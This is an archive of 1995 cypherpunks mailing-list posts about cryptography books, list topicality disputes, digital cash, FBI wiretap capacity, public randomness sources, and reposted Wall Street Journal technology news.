> anyone post an approx date so I could go look it up on the archive?
> Gracias.
> Interesting stuff.
> 





From loofbour at cis.ohio-state.edu  Fri Nov  3 08:50:07 1995
From: loofbour at cis.ohio-state.edu (Nathan Loofbourrow)
Date: Sat, 4 Nov 1995 00:50:07 +0800
Subject: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To: <acbe05a801021004ca84@DialupEudora>
Message-ID: <199511031547.KAA07609@hammond.cis.ohio-state.edu>


Ray Arachelian writes:
 > Now does anyone want my old 1st edition? :-)

I intend to donate mine to a local library. I'd like to think that
some bright high schooler, or junior high schooler even, might get the
crypto bug a little earlier than I did.

I'll try to persuade them to leave a copy of the errata stapled to the
inside back cover.  Heck, if you have the cash flow*, donate a 2nd
edition instead.

nathan
* or the need for a $60 tax shelter.





From rthomas at pamd.cig.mot.com  Fri Nov  3 09:15:30 1995
From: rthomas at pamd.cig.mot.com (Robert Owen Thomas)
Date: Sat, 4 Nov 1995 01:15:30 +0800
Subject: What!!!
In-Reply-To: <9511021825.S84530450@vabeach.email.net>
Message-ID: <9511031023.ZM14801@pamd.cig.mot.com>


tony266 said...
] Can someone tell me this cypherpunks is all about???

the great Dr Fred Cohen debate.  oh, and an occasional comment upon
encryption and security... ;-)

regards,
--robert
--

o  robert owen thomas: unix consultant. cymro ydw i. user scratching post.  o
o       e-mail: Robert.Thomas at pamd.cig.mot.com --or-- robt at Cymru.COM        o
o               vox:  708.435.7076   fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o





From hallam at w3.org  Fri Nov  3 09:18:18 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sat, 4 Nov 1995 01:18:18 +0800
Subject: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <199511030524.VAA03406@ix5.ix.netcom.com>
Message-ID: <9511031621.AA11770@zorch.w3.org>



>>Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
>>by people as well as EARNED by people.  Most payers have easily 
>>detectible physical presence and assets that can easily be attached by 
>>regulators.   It will be a cold day before, e.g., my employer agrees not 
>>to report my earnings.  And the same is true for most employers in most 
>>industries.  

>Unfortunately, this is true, at least for people whose employers are
>subject to income tax somewhere.  Taxing businesses doesn't make sense
>economically - you could collect almost as much money with far less disruption
>to the underlying economy by taxing it as wages for workers and

Why unfortunately? I happen to consider that our modern social ecconomy
is a high point of civilisation. It is certainly a tremendous achievement.
We can educate the entire population, provide them with health care,
prevent famine and provide protection against crime and agression by
other states. All in all rather a good deal.

While one might wish to personally avoid paying taxes there are no benefits if 
everyone avoids paying taxes. There are significant areas of the ecconomy
which can only be funded through social mandates, roads for example.
While there are fringe political elements who put forward alternative models
I find them no more convincing than the claims of the Marxists who made
similarly ideologically based assertions not so long ago. There have at 
least been examples of Marxist states, even though they were not particularly
successful and rapidly degenerated into dictatorships.


I find the libertopian obsession with government oppression and complete
indifference towards coporate exploitation unsatisfactory. The truth is
that both are inevitablty interlinked. For the "libertarian" it is 
unsatisfactory for the government to exploit consumers of utilities but
entirely satisfactory for corporations to do so should they have the chance.
The theoretical possiblity of competition making this acceptable even
where there is no actual competition and hence no choice. This 
corprativist model accepts supression of freedom provided it is to
commercial goals.

Consider the linkage between direct mail advertising and surveilance. It
is unecconomic for a government to trace the movements of every citizen.
The communist countries were brought down as much by the cost of the huge
surveilace administrations they constructed as anything else. In the
West we do not have government surveilance, we have direct mail marketers
do the job for government. Surveilance is made ecconomic by getting the
citizen to subsidise it. It is naturally open for the government to apply
information collected by these people for their own purposes. It is a 
salable commodity and the government is a willing buyer. Furthermore there
is a sophisticated infrastructure in place to achieve these ends.

The extent of corporate surveillance goes unnoticed by most citizens. Few
people realise that when they use their credit card in a supermarket they
are supplying a direct mail marketing company with a profile of their
spending paterns. They are also providing a statement of where they are,
and indirectly their income, residence etc.

What is needed is stringent data protection laws which enforce the 
confidentiality of personal information. Note that both the SEPP and
STT payments systems conceal the credit card number from the merchant.
Cryptographic locks on individual parts of the picture are insufficient 
however. What is needed is laws which make the financing of the 
underlying architecture unecconomic.

		Phill







From aleph1 at dfw.net  Fri Nov  3 12:02:55 1995
From: aleph1 at dfw.net (Aleph One)
Date: Sat, 4 Nov 1995 04:02:55 +0800
Subject: ecash remailer
In-Reply-To: <199510311940.OAA31415@opine.cs.umass.edu>
Message-ID: <Pine.SUN.3.90.951031201550.9466A-100000@dfw.net>


Ahh yes, but but Ed would not spend those coins, he would use them to 
launder others peoples coins such that any person laundering coins thrugh
Ed may randombly get a coin, even Alice and Charlie! Whats the bank to do 
when they see the coins bein spent by a few hundred diferent people.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 31 Oct 1995, Futplex wrote:

> Jumping in hastily:
> 
> It seems to me that Ed faces a larger problem if the above scenario turns
> out to be a viable attack. Consider the following sequence: Alice and
> Charlie decide to get some (payee-anonymous) currency laundromat in hot 
> water. Alice (payer-anonymously) washes some coins at the laundromat.
> Con-man Charlie claims he didn't get paid for some fictional transaction with
> Alice. Alice complains to the bank, and the rest proceeds as before. The
> Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
> situation from the bank's perspective.
> 
> -Futplex <futplex at pseudonym.com>
> 





From nobody at REPLAY.COM  Fri Nov  3 12:04:01 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 4 Nov 1995 04:04:01 +0800
Subject: IBM's Microkernal
Message-ID: <199511010122.CAA29490@utopia.hacktic.nl>


The Wall Street Journal, October 31, 1995, p. B6. 


IBM Announces New Software Code That Is Universal

By Laurie Hays


International Business Machines Corp., in its effort to reduce
the importance of computer-operating systems, announced a new
kind of universal-software code called Microkernal that
enables software to work on incompatible hardware.

For software developers and businesses that want to develop
one set of codes to run applications on many different
machines, Microkernal offers an opportunity for the
long-touted open computing. A big challenge remains, however:
to market the technology and make a business case for software
developers to write for Microkernal in a world that is
dominated by Intel Corp. and Microsoft Corp.

"It's exciting technology, but it will be hard for them to
market," says Dan Kuznetsky, an analyst with International
Data Corp., a Framingham, Mass., market-research firm. "It's
also got a long way to go from what they've announced to the
future."

Mr. Kuznetsky likens the technology to the development of a
great automobile transmission that has yet to be turned into
a truck or a car.

The key to Microkernal is a single source code base that
communicates between the hardware and the operating system.
One long-term possibility, for example, would be to make the
Apple Computer Inc.'s Maclntosh operating system work on an
Intel PC, impossible today because the two have different
design architectures that don't talk to each other.

IBM's delayed OS/2 operating system for the PowerPC chip,
which is expected to be shipped by the end of the year, will
be the first IBM offering for the Microkernal allowing
developers to move applications to the chip with only small
changes.

IBM so far has garnered a number of licensing agreements for
Microkernal, including Digital Equipment Corp., Maynard,
Mass., and LG Electronics, formerly the Korean electronics
concern Goldstar, as well as a number of universities.

-----













From perry at piermont.com  Fri Nov  3 12:35:49 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 4 Nov 1995 04:35:49 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To: <acbf9ee00b0210044261@[205.199.118.202]>
Message-ID: <199511031947.OAA00318@jekyll.piermont.com>



Timothy C. May writes:
> Implying that the reason Bellovin and Karn left the list--if they did, as I
> haven't checked--was because of "off-topic" posts seems to be a stretch.

They both left because the noise level was too high and the
cryptography content too low. I'll ask Steve to comment if you insist.

> Certainly using the departure of J. Random Subscriber, or even R. Noted
> Hacker, as "proof" that topics are inappropriate is flawed logic. "We've
> lost fine subscribers like Phil Zimmermann because of crap posted here." I
> suspect there's some fancy Latin name for this kind of appeal to authority.

The point of this list is to provide the community of people who are
interested in cryptography and its application to further personal
freedom to congregate and exchange information. If important members
of that community -- people with important input to give -- cease to
be here because of the noise level, then we most certainly are not
meeting our goal. Its not a question of appeal to authority, except
that we want this list to appeal (in the other sense) to authorities
in this field.

> Lots of other people have joined the list, and the subscription base has
> done from an earlier plateau of about 700 subscribers to more than 1200
> recently.

I don't care about quantity. Steve Bellovin is worth 500 subscribers
-- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
lot of this stuff than most of what passes for careful thought from
the average person here.

> Political aspects of strong cryptography have always been important to this
> list. Though new subscribers may be forgiven for thinking this is the
> "Netscape bug list," such has not always been the case. Key escrow was a
> dominant topic in the early days, as it is today.

Key Escrow is a fine topic of conversation. My problem is when someone
posts a long and totally irrelevant article about the value of
internet stocks to the list, as just happened.

Perry





From perry at piermont.com  Fri Nov  3 12:47:54 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 4 Nov 1995 04:47:54 +0800
Subject: Webernet Madne$$
In-Reply-To: <199511031826.TAA29048@utopia.hacktic.nl>
Message-ID: <199511031940.OAA00303@jekyll.piermont.com>



This is an example of what I've been talking about. This really isn't
a cypherpunks topic. I spent lots of time reading that article trying
to find references to cryptography, security, payment systems, or
anything else, and it contained none of them. Why post this here and
waste our time?

.pm

Anonymous writes:
> Wall Street Journal, November 3, 1995
> 
> 
> Wall Street is in the throes of Internet mania. Or is it
> Internet madness?





From tcmay at got.net  Fri Nov  3 12:49:03 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 04:49:03 +0800
Subject: Many Topics are Appropriate for Discussion Here
Message-ID: <acbf9ee00b0210044261@[205.199.118.202]>


At 2:38 PM 11/3/95, Perry E. Metzger wrote:

>Look, its simple. If you want the FBI and NSA to win, post lots of
>crap here. Nothing will help them out more than clogging one of the
>few communications channels available to people interested in
>spreading cryptography. If you are really successful, all the smart
>people will leave (as has happened in waves before -- the losses of
>Steve Bellovin and (effectively) Phil Karn are still felt) and you
>will have totally destroyed the channel.

There have been many posts which are more "clogging" than some minor
conspiracy rants. And if people don't want to respond to these rants,
they'll decline. Far more serious, in my opinion of course, are the
cross-posts to multiple mailing lists and the various press releases and
position papers bombarding us.

Implying that the reason Bellovin and Karn left the list--if they did, as I
haven't checked--was because of "off-topic" posts seems to be a stretch.
Even if Perry has gotten assurances from them personally that the
"off-topic" posts were a major factor, I'm not sure much can be concluded
from this. People leave for all sorts of reasons. I don't know what
reasons, if any, were responsible for the unsubscribings (or at least
nonpostings) of Bellovin or Karn, but I'm not too sure it matters.

I don't think it is useful to speculate on the causes for specific people
leaving the list, or even to ask them why they left. If they feel it is
important for us to know that they left the list because of too much talk
about UFOs, or about IETF committees, or about Netscape breakages, they can
tell us in their departing message.

Certainly using the departure of J. Random Subscriber, or even R. Noted
Hacker, as "proof" that topics are inappropriate is flawed logic. "We've
lost fine subscribers like Phil Zimmermann because of crap posted here." I
suspect there's some fancy Latin name for this kind of appeal to authority.

Topics have always been in flux, which is almost certainly a good thing,
else a lot of us would have left a long time ago. Certainly those
interested in some topics have little if any interest in other topics.

Lots of other people have joined the list, and the subscription base has
done from an earlier plateau of about 700 subscribers to more than 1200
recently. And many of the current subscribers are very active in
cryptography and security. I'd be tempted to mention a half dozen or so
names, but anyone I left out might feel slighted.

I do agree with Perry that longish political essays are probably not the
_best_ material for this list, though thoughtful essays on the implications
of digital cash, such as several folks have written about, are always
useful. And there are many troubling aspects of "crypto anarchy" that need
more explication, something I always feel is approprate for this list.

I am much less bothered by _custom written_ essays by current subscribers,
whatever the topic, than by reposts of long articles from other lists.
Thus, occasional rants from list members are preferable, to me, to longish
essays from outsiders, generally speaking.

Political aspects of strong cryptography have always been important to this
list. Though new subscribers may be forgiven for thinking this is the
"Netscape bug list," such has not always been the case. Key escrow was a
dominant topic in the early days, as it is today. And there are massive
numbers of issues to be discussed in the digital money area, involving
banking laws, the role of intelligence agencies in desiring to monitor cash
flows, the legal implications of anonymous cash, and scads of technical
issues.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From pcw at access.digex.net  Fri Nov  3 13:17:23 1995
From: pcw at access.digex.net (Peter Wayner)
Date: Sat, 4 Nov 1995 05:17:23 +0800
Subject: video as a source of public randomness
Message-ID: <v02130503acc01193c4a4@[199.125.128.5]>


At 12:08 PM 11/3/95, Perry E. Metzger wrote:

>Timothy C. May writes:
>> I  don't plan to belabor this point. Radioactive decay sources are
>> certainly fine, though not likely to be purchased by most people.
>
>Video digitzation equipment connected to TV tuners turned to dead air,
>your suggestion, are equally unlikely to be purchased by most
>people. The geiger counters are very simple and cheap, too.
>
>Perry

Well, it's true that video digitization equiptment _used_ to be unlikely to
be purchased.
Now, it is often standard equiptment. I recently purchased a Mac Performa
for a Customer
Support desk. We chose a cheaper model that came with a built-in video
tuner. It came
with a _remote control_ that would allow you to switch channels and adjust
the volume
just like a regular remote. It was very nicely integrated and ready to suck
down signal
from an antenna.

While I haven't hacked that part of the Mac kernal, I would not be
surprised if it was easy
to turn the signal into a Quicktime video file ready for hashing.

This was, incidentally, one of the cheaper Performas available at the time.
Your mileage
may vary because Apple is really flipping all over the place on features.
But, now that the cold
war is over, I don't expect them to be offering the Radiation Manager
plug-in any time soon.

-Peter







From anonymous-remailer at shell.portal.com  Fri Nov  3 13:26:40 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 4 Nov 1995 05:26:40 +0800
Subject: censored with Perry
Message-ID: <199511031858.KAA24013@jobe.shell.portal.com>


Perry writes:
>>    Perry is again narrowly defining allowable speech on Cypherpunks.
>> Encryption becomes a trivial topic if its best medium is taken by the
>> States. Perry is still in his "only encryption algorithms in C is a
>> proper topic for Cypherpunks" mode.
>
>No, I don't think that, Mr. Jeffers, but I must admit that my opinion
>is that random political crap (NOT careful announcements by the likes
>of jya at pipeline.com of reprints of articles on the new FBI wiretap
>garbage) doesn't belong. 

Well, Perry, my opinion is that there is far too much noise on this list 
as it is.  I have already seen my words drowned out by bellyaching over 
next to nothing.

As one of the many non-Americans on this list, I find US policy and
politics simply _amusing_, but certainly not in the least bit relevant to
nearly anything that I do. 

>> This is a direction that if followed
>> would take the vitality and relevance out of the Cypherpunks list. Perry
>> does a disservice for Cypherpunks.
>
>I'm sorry, but you do a disservice to the cause of freedom. People are
>trying to get work done to actually get cryptographic systems written,
>deployed, and popularized, and the sort of crap that fills this place
>periodically prevents people from working together towards that
>end. If you want to talk about politics, go to Libernet or some such. 

Perry, you put an interesting twist on what the agenda of most people on
this list is.  It is not "getting cryptographic systems written, deployed,
and popularized."  It's about getting people to learn how to protect their
privacy and to see that their self-interest is served by having privacy. 

That's much more than "writing code".  If you have an insecure machine, a 
machine on which I can monitor your keystrokes as you enter your pass 
phrase, what good is strong crypto??

Somewhere between diddly and squat?

>>    Since when did Cypherpunks become the mailing list fit for Perry?
>
>Look, its simple. If you want the FBI and NSA to win, post lots of
>crap here. Nothing will help them out more than clogging one of the
>few communications channels available to people interested in
>spreading cryptography. If you are really successful, all the smart
>people will leave (as has happened in waves before -- the losses of
>Steve Bellovin and (effectively) Phil Karn are still felt) and you
>will have totally destroyed the channel.

What would Perry have us do??  What does he want??  Does he want all of us
to order radiation detectors to beef up our random number generators?? 

Talk about a red herring!!

How about this instead Perry?  How about if you suggest that everyone make
sure that every Network which a machine connects to, and every other
trusted Network has removed the username/password combinations,
"tech/support", "LAN/admin", and "guest/user". 

This is easy to do, and is a solid recommendation. Unless the almighty
"Perry" would rather that you NOT worry about simple security matters
which protect privacy and are within anyone's control. 

>> we must also take the time and trouble to occasionally tell Perry to
>> shove his opinions up his ass.
>
>If you want the anti-crypto people to win, nothing can help nearly so
>much as your attitude. I'm glad to see what side you are on.

There's lots of things I could think of doing to Perry's ass, and shoving 
his opinions is but one of them.

It was hard enough for me as a Canadian to watch 3 out of 5 Francophones
vote to separate from Canada and form their own nation. And to then watch
as two leaders from within English Canada -- Preston Manning who runs the
Reform Party, and Ralph Klein, who is Premier of Alberta -- breach
protocol and insult the peoples of Quebec by discussing, commenting and
gloating over the overall election results even before concession speeches
by Bouchard and Parizeau.

And I groaned later when Parizeau said that the overall vote squeaker was
a result of "money and the ethnic vote."  Touche. 

But this is nothing in comparison to listening to some jackass talk out 
of both sides of his mouth, while he deliberately attempts to steer 
people away from what the MAJORITY of posters to this list have a strong 
common conviction about.  Securing their systems and their personal privacy.

It might be a rag tag bunch with differing political ideologies, but one 
idea brings all of us together here.

Except for one ... jackass.

And yep, I'm back after a brief silence.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.















From sjb at universe.digex.net  Fri Nov  3 13:43:58 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Sat, 4 Nov 1995 05:43:58 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <9511021709.AA03831@zorch.w3.org>
Message-ID: <199511031743.MAA09044@universe.digex.net>


hallam at w3.org writes:
>It is a fair point that just because technology has changed the 
>nature of the game it should not mean that wiretaps cease to be 
>possible.

No it isn't.  If someone builds a "cone of silence", traditional audio
surveillance becomes impossible.  Why should wiretaps be any
different?  Strong crypto is the "cone of silence" for digital
transmission.





From m5 at dev.tivoli.com  Fri Nov  3 14:27:04 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Sat, 4 Nov 1995 06:27:04 +0800
Subject: Telephone switch capacity
In-Reply-To: <s09a2bef.049@allegro.net>
Message-ID: <9511032051.AA14124@alpha>



Noah Brodbeck writes:
 > 	Please be aware that the current capacity of the
 > telephone system in the United States (and for that matter,
 > most of the developed world) is only capable of supporting
 > between 15 and 20 percent simultaneous telephone
 > conversations.  If the FBI wishes to set up a system that is
 > capable of monitoring 1% of the total number of lines, that
 > equates to a ability to tap 5%, not 1% of all calls in progress.
 > 

According to an article that was out on the AP newswire (check under
<URL:http://http://www1.trib.com/WIRE/CURRENT/>), the "1%" figure
applies to actual capacity.  In other words, if there's a switch with
50K subscribers but actual capacity for 5K simultaneous calls, the FBI
wants to be able to make 50 simultaneous taps.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From shields at tembel.org  Fri Nov  3 17:12:18 1995
From: shields at tembel.org (Michael Shields)
Date: Sat, 4 Nov 1995 09:12:18 +0800
Subject: Transcript of Bernstein hearing is now available
In-Reply-To: <9511020308.AA25206@toad.com>
Message-ID: <47e5mc$pec@yage.tembel.org>


In article <199511021951.LAA03152 at mycroft.rand.org>,
Jim Gillogly <jim at acm.org> wrote:
> 	s/([^a-z])nsa([^a-z])/$1NSA$2/g;  # Another one

It'd be faster to use `s/\bnsa\b/NSA/g' for these constructs.
-- 
Shields.





From hallam at w3.org  Fri Nov  3 17:40:02 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sat, 4 Nov 1995 09:40:02 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To: <acbf9ee00b0210044261@[205.199.118.202]>
Message-ID: <9511032235.AA13095@zorch.w3.org>



Hi folks,

	There is a bug in mh mail that causes all mails to be rejected after
there are more than 9999 in the same mailbox. I recieved 100 in two hours
today so I suspect the subject line may well be related to my earlier post.
They mostly fell on the floor. The rest are 50-50 pro/anti.

	Just a calibration point. The libertarians on the list do not seem
to shrink from expressing their political views. Indeed the entire discussion
on the NSA is a political thread pure and simple. My post related directly
to the question of personal privacy rights in a democratic, plural society.
I do not regard that it was off topic in any sense. I was not aware that
any agreement was in effect as to the method by which goals might be 
achieved. I chose to persue goals by the means most likely to succeed. In 
that I am a pragmatist. Government regulation often provides social benefits
it is not by definition an evil to be avoided. In any case regardless of the
rhetoric government regulation increases, I prefer to press for some
regulations I like rather than dream about there being none whatsoever.

	I do not separate the question of politics from technology. My 
reasons for working on the Web have from the start been explicity political.
I regard the persuit of technology without consideration of the political
consequences to be unethical.

	I am only in a position to influence the political process if I
understand the position of the administration and can demonstrate an 
appreciation of their concerns. As Sun Tsu said "you must build a golden
path along which your enemies may retreat". The problem with government
is not that it is a conspiracy, it is an interlocking series of
beuraucracies which all seek to avoid responsibility. 

	If you want to get Phil Z. off the hook or foul up the governments
escrow scheme plans you have tobe prepared to step into their mindset
and walk about on the inside a bit. somewhere inside the government there is
a jobsworth who is deciding to hassle Phil Z., this person will be a civil
servant, not a political appointee. Ie the dregs which get left behind each
time there is a new administration. What we need to do is to identify that 
person and nail their ass to the wall. It has to become apparent to the
administration that that individual has created an unnecessary source of
embarassment. 

	It seems to me that the purpose of key escrow is not to allow the US 
govmt to spy on its citizens. I think they want to stop strong crypto getting 
out because there are still a large number of governments cables they can break 
and they want the fun to continue a while. No external government is going to 
trust a system that is clearly subject to US govt. interference.


	If someone comes up with a crypto proposal to avoid paying taxes I
know it will never get anywhere. If they come up with a crypto proposal that
guarantees that a tax is paid but conceals the identity of the persons
involved I get much more interested.

	If somone makes contiuous political spiels themselves but object when
I make one they disagree with (as one person has done) I am not going to take
their objection as indicating anything other than an inability to argue their
case.

		Phill

PS I'm also none to impressed by people who make comments like "you are wrong 
about XXX but I won't explain why".





From cjl at welchlink.welch.jhu.edu  Fri Nov  3 18:00:34 1995
From: cjl at welchlink.welch.jhu.edu (cjl)
Date: Sat, 4 Nov 1995 10:00:34 +0800
Subject: Apologies for spam
Message-ID: <Pine.SOL.3.91.951103171035.6180C@welchlink.welch.jhu.edu>


C-punx

I really didn't mean to send that last message to the list.  I had 
stiffened my resolve not to rise to the obvious troll bait, but a minor 
seizure of some sort resulted in the send command being issued instead of 
the cancel command. . .

By way of making up for it I thought that some of you might be interested 
in knowing that AAAS is having it's annual meeting in Baltimore this year 
and of interest to those pondering alternative means to bruting 
cryptosystems are the sessions below:

DNA Computing, Friday Feb. 9, 8:30 - 11:30 am
Organized by Richard Lipton, Princeton University

Quantum Computation, Friday Feb. 9, 2:30 - 5:30 pm 
Organized by Seth Lloyd, MIT

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl at welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )






From nobody at REPLAY.COM  Fri Nov  3 18:03:16 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 4 Nov 1995 10:03:16 +0800
Subject: Webernet Madne$$
Message-ID: <199511031826.TAA29048@utopia.hacktic.nl>



Wall Street Journal, November 3, 1995


Wall Street is in the throes of Internet mania. Or is it
Internet madness?

Investors have poured into Internet-related stocks in the
past couple of days, pushing some Web darlings such as
Spyglass and Netscape Communications to dizzying new
heights.

"People are blindly investing in anything that says
Internet," said Willian Bluestein, an analyst at
Forrester Research in Cabridge, Mass.

"Everyone wants to buy into the craze," says John
Sebrich, who works with mutual-fund investor Mario
Gabelli. ...

What is the big stampede all about? During the past week
or so, some of the highest-profile, highest-flying
Internet stocks have actually reported profits, a
development the Street wasn't expecting until next year
at best. ...

"The reason Intuit's moving up is the realization that if
you had to do the banking industry over again, you
wouldn't use brick and mortar," said Neal P. Miller,
manager of Fidelity Investments' New Millennium Fund.
"I think the size of this Internet thing is just dawning
on everyone," he said.

Neil Weintraut said, "Money managers are realizing that
there is tremendous strength behind this. It's not just
a technology chasing a marketplace." ... [and more gush]

______________________________________________________

Web and Wild [Chart]
______________________________________________________

                                             Percent
                              Yesterday's    Change
Company                       Close          This Week
______________________________________________________

Spyglass                      $70.50         +70%
Uunet Technologies             67.00         +41%
Netcom Online                  68.63         +30%
Performance Systems            21.25         +30%
Intuit                         82.75         +21%
Netscape                       98.25         +21%
______________________________________________________


-----

European Firms Join Research Group In Bid to Guide
Internet Development

By Douglas Lavin


Paris - - Afraid of being frozen out of the booming
interest in the Internet, 20 European companies joined
together to form the European arm of an Internet research
group.

The World Wide Web Consortium's European branch will work
with the U.S. Web consortium on such global issues as
electronic commerce, but it will also work on such
international issues as the use of languages other than
English on the Web, the multimedia portion of the
Internet.

"We must assure that the beautiful springtime of the
World Wide Web is not also the autumn of the French
language," said Elisabeth Dufourcq, France's secretary of
state for research at a conference here to announce the
creation of the European branch.

Several large European technology firms, including Oy
Nokia of Finland and Siemens AG of Germany, who are
hoping to play a major role in the development of the
Internet here ponied up $150,000 to join the consortium.
Particularly well-represented are telephone companies who
see the Internet as a threat to their ability to control
national voice and data networks. Among the European
members of the consortium, announced at a conference on
the Web here, are British Telecommunications PLC and the
national telecommunications companies of France, Germany,
Italy and Belgium. All five companies either offer or are
planning to offer Internet access.

One of the group's key tasks is to ensure that
improvements made by such rival companies as Netscape
Communications Corp. and Microsoft Corp., both members of
the U.S. consortium, don't create separate parts of the
Internet that can only be read by Microsoft or Netscape
software.

Membership in the European consortium, which is to be
based at the French national computer-research institute,
Inria, also shows a remarkable degree of interest in the
Web by the French business and government establishment,
which only a year ago dismissed the Internet as a
American version of France's Minitel network, but now is
avidly promoting the Internet's growth.
Among the members of the consortium from France are
Assurances Generale de France, the insurance company;
Electricite de France, the electricty company; Cie. des
Machines Bull, the computer maker; Aerospatiale, the
aerospace concern; and Thomson-CSF, the arms
manufacturer, all of them state-controlled, as well as
such private concerns as Alcatel-Alsthom SA and Groupe
Michelin.

Inria, which already has taken over some Web research
work from CERN, the nuclear-research organization in
Switzerland where the Web was created in 1989 by Tim
Berners-Lee.

Mr. Berners-Lee, now at the Massachusetts Institute of
Technology, is heading both the U.S. and the European
research consortia.

[End]

-----


Nuclear research > munitions research > controlled crypto > 
controlled commerce > economic espionage > ten thousand-year 
reign of the PGP-DigiBank-MIT-CERN crypto-commo-libertarian 
nerds.


Phill, what's the admission code to W3 world domination?









From futplex at pseudonym.com  Fri Nov  3 18:08:55 1995
From: futplex at pseudonym.com (Futplex)
Date: Sat, 4 Nov 1995 10:08:55 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511031947.OAA00318@jekyll.piermont.com>
Message-ID: <199511040030.TAA28181@opine.cs.umass.edu>


Perry writes:
> I don't care about quantity. Steve Bellovin is worth 500 subscribers
> -- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
> lot of this stuff than most of what passes for careful thought from
> the average person here.

I have some not-so-hypothetical questions: 

Suppose I have serious and plausibly realistic aspirations to become an 
authority in some subtopic of cryptography, network security, etc. (sometime 
well into the next millenium). Am I more likely to learn and hone my skills
by actively participating (sticking my neck out) or merely lurking
indefinitely ?  Regardless of the answer to the previous question, should
the list suffer me my missteps and naivete ?

I do not consider these questions rhetorical, and the answers are very
important to me on a personal level.

And now I believe I'll shut up for a while.

-Futplex <futplex at pseudonym.com>





From JMKELSEY at delphi.com  Fri Nov  3 18:17:34 1995
From: JMKELSEY at delphi.com (JMKELSEY at delphi.com)
Date: Sat, 4 Nov 1995 10:17:34 +0800
Subject: public random numbers
Message-ID: <01HX7UTFXLK29BWWKZ@delphi.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 03 Nov 1995 00:44:02 -0800
>From: tcmay at got.net (Timothy C. May)
>Subject: Re: video as a source of public randomness
>
>At 6:23 AM 11/3/95, JMKELSEY at delphi.com wrote:
>
>>This seems like a potential source of a stream of public random
>>bits.  If these can be authenticated and matched, this kind of thing
>>can be useful in a lot of protocols.  For example, if there is some
>
>I'm not sure what you mean by "public random bits"...I don't plan to share
>my random bits with anyone, nor do I see any need for "public" random bits
>(except for some well-known situations involving statistical testing, for
>which certain PRNGs are actually preferable to "real" random numbers).

Imagine there is a stream of totally random bits over which neither
Alice nor Bob has any control.  We can use this to make a lot of
interactive protocols non-interactive.

Suppose we have a protocol where we need a random challenge from
Bob.  Alice sends a message to Bob starting the protocol, stating
that the public random bit stream is currently at bit i, and
committing to use the n-bit string starting at position (i+t) as the
challenge.  The t parameter here needs to be large enough to ensure
that Bob receives and logs the message before the public random bit
stream outputs bit i+t.  Alice proceeds with the protocol, using the
n-bit string starting at bit (i+t) as the challenge.  She sends the
resulting message to Bob.  No interaction was required of Bob--he
merely had to log the times of the messages, and keep track of the
public random bits.  This could be really useful implementing
noninteractive digital cash schemes, I think, because the merchant
wouldn't have to send anything back.  (The merchant can also be very
hard to track down by following the messages, since these messages
of Alice's can be encrypted under his public key and posted to a
newsgroup or something, though this implies really large values of
t.)

Naturally, this only works if Alice and Bob get the same random
string, and if it's not possible for anyone to alter the public
random bit string either one receives.  For large-scale
applications, the way to do this is probably to put a hardware RNG
into a communications satellite, and devote one channel to
continuous digitally-signed packets of random data.  For
smaller-scale or underground applications, it might be sufficient to
use some digitized transmission that would probably not be worth the
trouble for an attacker to alter, even if one could.  For example,
if we used the entire digital video feed off some major satellite,
it would be enormously expensive to take control of that for any
length of time, to attack some protocol.  To prevent simple attacks,
we can hash the digitized input, and we can make each shared random
packet dependent on previous packets by some relation like

random_packet[i+1] = SHA1(random_packet[i],SHA1(digital_video_packet[i])).

>And so there's no confusion, when I said "like a noisy channel (t.v.
>channel, for example)" I meant a snowy, noisy picture such as one gets with
>rabbit ears on top of the set, especially when the channel is an unused
>one. It is unlikely in the extreme that any attacker could deduce the snowy
>pixel values used in the distillation of entropy.

I was just thinking of the unintended entropy in the stuff going on
on the screen.  Static would mess this idea up, though there are
some ways to recover.

>But back to the subject of "public random bits." Could you elaborate on
>what you mean by this? (I assume you don't mean a one time pad that Alice
>and Bob share, since that is really a separable issue from video as a
>source of randomness. Only one of them will generate the pad, and will then
>securely communicate it to the other.)

